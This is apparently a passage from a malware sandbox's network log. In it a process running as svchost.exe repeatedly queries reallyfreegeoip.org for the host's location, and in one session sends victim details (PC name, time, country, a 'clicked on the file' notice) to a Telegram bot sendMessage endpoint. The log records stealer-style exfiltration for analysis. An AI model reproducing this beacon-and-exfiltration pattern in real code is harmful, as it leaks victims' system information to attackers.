                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.549718104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:52 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 14:33:52 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:52 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834421
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wBJ%2FGyIfLFkuxvf3r6Ry0WjBXMZ1Inh1x4ARGFxXKpIETczBbNQT6o7HlI0xPgjZ%2FIzre6fuYeqp70oRo0BbT4vkT86VwcF%2BkEC2pJepebTWu%2Ff66o0%2FRLdx8u2lfSStygV88%2FMN"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd6275b9bf41a6-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1540&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1770770&cwnd=241&unsent_bytes=0&cid=4805a2559d6128d5&ts=155&x=0"
                                                                                                                2025-01-10 14:33:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.549721104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:33:53 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:53 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834422
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bwbI9CAApTwqVgoSVTyrUlI3zbli%2FqxKJMZUqfYELiIC%2FyXvGI7TGmY8p6cUlw6yila6G0vji9ObBHmUZSllvdGm4eDVPeafzQGpJ9UlFMrhZpZ18QGYbbHqBI7YA%2FDg2h%2FEY49w"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd627e0c6441a6-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1671&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1721698&cwnd=241&unsent_bytes=0&cid=a9da8ce28c7df97a&ts=166&x=0"
                                                                                                                2025-01-10 14:33:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.549722149.154.167.2204432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:33:54 UTC344INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 14:33:54 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 14:33:54 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.549725104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:33:55 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:55 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834424
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K7N5LqwUfpVW%2F8uo4j1qTFRW6eq7lrx35ddikk6D8prK%2FbBT9RTfyenddskkVXhw16J48IEQSRq%2Bhb5SdeqnxgiUScTbLH03PW31o%2B6hqivvTT0ddVC%2FWM4UpgK0uaKvM3NDE1iO"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd6288f9b6c327-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1676&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1726788&cwnd=189&unsent_bytes=0&cid=b4d2e6dd6dd0b0da&ts=166&x=0"
                                                                                                                2025-01-10 14:33:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.549732104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:56 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 14:33:56 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:56 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834425
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ph8PDkKjZvgalwuzpZHlUSL8yeECUXq%2BV5N0RzDX5QXcd7cYg6CqtT4VRJyA3ufFH7FVQuhUtuNERliwj13LLBFBQDzA7Xob2vaVlIDhkYf6ua8H5NZyfdFpEj6LmsALDB9Ae3g1"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd628e3e33c327-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1542&rtt_var=583&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1870595&cwnd=189&unsent_bytes=0&cid=9dbe1537c092f5d9&ts=135&x=0"
                                                                                                                2025-01-10 14:33:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.549744104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:57 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 14:33:57 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:57 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834426
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7TotfegEDKs7inNwa9MVmUEjrhSGvEV8xgRxkrzOXq5WyUiaqbfwZK9EmlKieg0EUiI7FU8uxRI5zjaUa1mD6HXRha8x2jd3TgArFzdL5wL0CsJT%2BCMWUcpvkoxqZVT8ZgQjD4G8"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd6296ace71875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1703&rtt_var=686&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1714621&cwnd=153&unsent_bytes=0&cid=217ac745d356f07b&ts=157&x=0"
                                                                                                                2025-01-10 14:33:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.549753104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:33:58 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:58 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834427
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7iDLQmpb5htsOV%2F9LxVMwWuUum0vOKUjoi2obrIBI%2FPT2uxkEeOq%2Bbz%2BzFDWnpWjcRled0D%2FP5VkK2smE5TMzW%2FCH3ndGCE34iOXsuOGFwGxnZrY0o3uCVxECgD308LgR9hHrLwd"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd629eacfb8cda-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1789&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1586956&cwnd=243&unsent_bytes=0&cid=c946d3423c6d9297&ts=141&x=0"
                                                                                                                2025-01-10 14:33:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.549765104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:34:00 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:34:00 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:00 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834429
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3l1a0wH5KYOd6D6ln9UhOHhEgGZt49xTmKcUbYdWMyyjVjfr3DyJMewPI%2Ftb8UbSSSin7hXWQDtsyImRpoTcJC1DunFli3Qy4vsdrEYftL0ucUP3LFR6XbqT32YChi3G9cVKDfB"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd62a6d8bf8cda-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1788&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1573275&cwnd=243&unsent_bytes=0&cid=a1ce720cf59acee2&ts=157&x=0"
                                                                                                                2025-01-10 14:34:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.549776104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:34:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:34:01 UTC853INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:01 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834430
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPraCJWA3dOWBQV%2Fu8eHMD1Op5TGrjk0mrMreFNKJERzmThHmDMPLofOaVQ3huBsJjX7VwPWysS4b7iyDY4mFZ0W7Ai3xjfGLPWRIdwKA2ajuK0wkIH2R81aKjNVVinj%2Fon20oHm"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd62aecf1e1875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1623&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1773997&cwnd=153&unsent_bytes=0&cid=663bbb7fa543a299&ts=131&x=0"
                                                                                                                2025-01-10 14:34:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.549784104.21.32.14436572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:34:02 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:34:02 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:02 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834431
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rFFaUZMdtVy2KAlac7Qm1UWnhf%2FRAgaH11jpED8OyJveD7FglhSK%2FHQSzRyyIf3gbRun7WWrvMXeZo7%2B1fyBX2YFQ404YfyGEo4taRfg%2BnwHdGcGiUioT7lNzzTj64hdwj%2FFxoS"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd62b6f8d68cda-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1788&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1613259&cwnd=243&unsent_bytes=0&cid=5b32bbf776db286f&ts=144&x=0"
